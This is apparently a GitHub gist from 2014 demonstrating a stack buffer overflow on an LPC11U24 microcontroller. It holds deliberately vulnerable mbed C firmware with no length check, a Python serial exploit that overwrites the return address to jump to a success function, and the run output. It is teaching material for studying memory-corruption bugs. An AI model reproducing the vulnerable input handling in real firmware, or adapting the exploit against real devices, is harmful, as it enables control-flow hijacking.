Created
July 31, 2014 05:26
-
-
Save jitomesky/c74748a085630d214efb to your computer and use it in GitHub Desktop.
LPC11U24 stack buffer overflow demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/local/bin/python3 | |
# -*- coding: utf-8 -*- | |
# please install pyserial | |
import serial | |
tty = "/dev/tty.usbserial-FTGD5T90" | |
com = serial.Serial(tty, 115200) | |
s = "" | |
while s.find("code:") < 0: | |
c = com.read(1) | |
s = s + bytes.decode(c) | |
print(s) | |
print("bof attack start!") | |
# 32byte payload | |
buf = [32, 0, 0, 0] | |
for i in range(int(32/4)-1): | |
# 0x000003c5 : success_process | |
# 0x000003c5 little endian | |
buf.append(0xc5) | |
buf.append(0x03) | |
buf.append(0x00) | |
buf.append(0x00) | |
# attack | |
com.write(bytearray(buf)) | |
print("received message:\n") | |
while True: | |
print(bytes.decode(com.read(1)), end="") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ ./bof_attacker.py | |
memory map: | |
main: 0x000004b1 | |
bof_vlun: 0x000003f5 | |
bof_vlun_pad: 0x00000489 | |
verification: 0x00000395 | |
success_process: 0x000003c5 | |
enter bof_vlun_pad | |
enter bof_vlun | |
code: | |
bof attack start! | |
received message: | |
enter bof_vlun | |
exit bof_vlun | |
verification error in bof_vuln | |
exit bof_vlun | |
enter success_process | |
verification success! | |
exit success_process | |
enter bof_vlun_pad | |
enter bof_vlun |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// LPC11U24 stack buffer overflow vulnerable demo | |
// using mbed library | |
// written by Toshifumi Nishinaga | |
// This code is public domain | |
#include "mbed.h" | |
DigitalOut myled(LED1); | |
Serial serial(P0_19,P0_18); | |
int verification(unsigned char *data) | |
{ | |
int ret=0; | |
serial.printf("enter bof_vlun\n"); | |
if(data[1] == 0xfe) | |
ret = 1; | |
serial.printf("exit bof_vlun\n"); | |
return ret; | |
} | |
void success_process(void) | |
{ | |
serial.printf("enter success_process\n"); | |
serial.printf("verification success!\n"); | |
serial.printf("exit success_process\n"); | |
} | |
void bof_vlun(void) | |
{ | |
unsigned char bin[10]; | |
serial.printf("enter bof_vlun\n"); | |
serial.printf("code:"); | |
// wait data | |
while(!serial.readable()); | |
// get data length | |
bin[0] = serial.getc(); | |
////// vuln point : forget length check////// | |
for(int i=1; i < bin[0]; i++) { | |
// wait data | |
while(!serial.readable()); | |
// input | |
bin[i] = serial.getc(); | |
} | |
////// vuln point ////// | |
if(verification(bin)) { | |
success_process(); | |
} else { | |
serial.printf("verification error in bof_vuln\n"); | |
} | |
serial.printf("exit bof_vlun\n"); | |
} | |
void bof_vlun_pad(void) | |
{ | |
serial.printf("enter bof_vlun_pad\n"); | |
bof_vlun(); | |
serial.printf("exit bof_vlun_pad\n"); | |
} | |
int main(void) | |
{ | |
serial.baud(115200); | |
serial.printf("memory map:\n"); | |
serial.printf("main: 0x%08x\n", &main); | |
serial.printf("bof_vlun: 0x%08x\n", &bof_vlun); | |
serial.printf("bof_vlun_pad: 0x%08x\n", &bof_vlun_pad); | |
serial.printf("verification: 0x%08x\n", &verification); | |
serial.printf("success_process: 0x%08x\n", &success_process); | |
while(1) { | |
bof_vlun_pad(); | |
} | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment